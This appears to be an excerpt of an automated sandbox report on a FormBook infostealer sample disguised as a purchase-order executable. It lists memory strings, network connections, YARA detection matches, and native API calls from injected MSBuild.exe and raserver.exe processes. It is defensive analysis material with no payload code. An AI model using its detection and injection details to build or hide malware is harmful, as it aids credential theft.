          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417BA0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417C50 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417CD0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417D80 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417C4C NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417CCA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015299D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015298A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015295F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677BA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677C50 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677CD0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677D80 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677C4C NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677CCA NtClose,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130EB70
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130EB60
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130CB5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C16E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00408A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00408A3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BF03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01504120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015BE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015ADBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015BDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01506E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489D466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04802581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047ED5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048ADFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048020A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FA830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048AE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047EB090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F4120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F99BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0488FA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048903DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489DBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067C16E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00668A40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00668A3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067C52F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067BF03
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 014EB150 appears 136 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 047DB150 appears 72 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exeBinary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
